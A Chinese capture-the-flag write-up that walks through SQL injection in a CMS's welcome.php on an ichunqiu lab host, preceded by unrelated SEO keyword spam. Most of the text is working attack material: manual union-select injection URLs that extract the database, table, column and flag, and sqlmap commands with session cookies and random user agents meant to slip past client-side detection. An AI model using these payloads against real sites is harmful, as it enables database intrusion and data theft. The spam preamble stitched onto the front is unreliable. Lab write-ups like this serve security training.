关于网站建设与维护的参考文献,cnzz统计代码如何添加到网站上去,百度seo营销网站,石家庄网页设计公司文章目录 一、相关信息二、解题思路#xff08;手注#xff09;三、通关思路#xff08;sqlmap#xff09; 一、相关信息 靶场提示#xff1a;该CMS的welcome.php中存在SQL注入攻击。 NVD关于漏洞的描述#xff1a; 注入点不仅在eid处#xff01;#xff01;#xff… 文章目录 一、相关信息二、解题思路手注三、通关思路sqlmap 一、相关信息 靶场提示该CMS的welcome.php中存在SQL注入攻击。 NVD关于漏洞的描述 注入点不仅在eid处 二、解题思路手注
1既然NVD说漏洞在welcome.php处且参数为eid先注册账号。 2登录账号后发现页面就是welcome.php。
3随便点一个action点点submit会发现url中的n参数会变。故判断是否存在sql注入的payloadeci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141b8009cf0n1‘t10单引号判断法。 添加单引号后页面报错说明存在SQL注入。 知识点在参数后面加’无论是字符型还是数字型注入都会报错。 4判断是数字型注入还是字符型注入payloadhttp://eci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141b8009cf0n1%27%20and%20%271%27%20%20%271t10 http://eci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141b8009cf0n1%27%20and%20%271%27%20%20%272t10 知识点 1判断为数字型注入 and 11页面正常and 11 页面报错。 2判断为字符型注入’ and ‘1’1页面正常’ and ‘1’2页面报错。 5判断有几列payloadhttp://eci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141b8009cf0n1%27%20order%20by%20%205%20--%20%20#t10。经判断表存在五列。 知识点使用order by时必须保证其之前的语句为真。 6判断回显位置payloadhttp://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141b8009cf0n1%27%20union%20select%201,2,3,4,5--t10 7数据库名payloadhttp://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141b8009cf0n1%27%20union%20select%201,2,database(),4,5--t10 8表名payloadhttp://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141b8009cf0n1%27%20union%20select%201,2,(select group_concat(table_name) from information_schema.tables where table_schemasecurity),4,5--t10 9字段名payloadhttp://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141b8009cf0n1%27%20union%20select%201,2,(select group_concat(column_name) from information_schema.columns where table_schemactf and table_nameflag),4,5--t10 10字段内容payloadhttp://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141b8009cf0n1%27%20union%20select%201,2,(select group_concat(concat(flag,%23)) from ctf.flag),4,5--t10 三、通关思路sqlmap 注入六连 sqlmap -u http://www.xx.com?idx (查询是否存在注入点)--dbs (检测站点包含哪些数据库)--current-db (获取当前的数据库名)--tables -D db_name (获取指定数据库中的表名 -D后接指定的数据库名称)--columns -T table_name -D db_name(获取数据库表中的字段)--dump -C columns_name -T table_name -D db_name (获取字段的数据内容) 注意由于该页面采用了登录访问所以首先想到要使用–cookie参数使得sqlmap绕过身份验证并添加–user-agent参数或–random-agent使得sqlmap绕过客户端验证否则可能会被识别到明显的sqlmap客户端标识从而导致攻击的中断。如 --cookiePHPSESSIDk5854nfic1qngm5ul1vmb8pbma--user-agentMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.01查询是否存在注入点payloadsqlmap -u http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141f1e8399en2t10 --cookiePHPSESSIDvq98au2drskf8ltmkv230i719l --random-agent sqlmap爆破出该站点存在两个注入点。 2检测站点包含哪些数据库payloadsqlmap -u http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141f1e8399en2t10 --dbs --cookiePHPSESSIDvq98au2drskf8ltmkv230i719l --random-agent 3获取当前数据库名payloadsqlmap -u http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141f1e8399en2t10 --current-db --batch --cookiePHPSESSIDvq98au2drskf8ltmkv230i719l --random-agent --batch默认确认不询问你是否输入。 4获取指定数据库中的表名。payloadsqlmap -u http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141f1e8399en2t10 --tables -D ctf --batch --cookiePHPSESSIDvq98au2drskf8ltmkv230i719l --random-agent 5获取指定数据库表中的字段名payloadsqlmap -u http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141f1e8399en2t10 --columns -T flag -D ctf --cookiePHPSESSIDvq98au2drskf8ltmkv230i719l --random-agent 6获取字段的数据内容payloadsqlmap -u http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid5b141f1e8399en2t10 --dump -C flag -T flag -D ctf --cookiePHPSESSIDvq98au2drskf8ltmkv230i719l --random-agent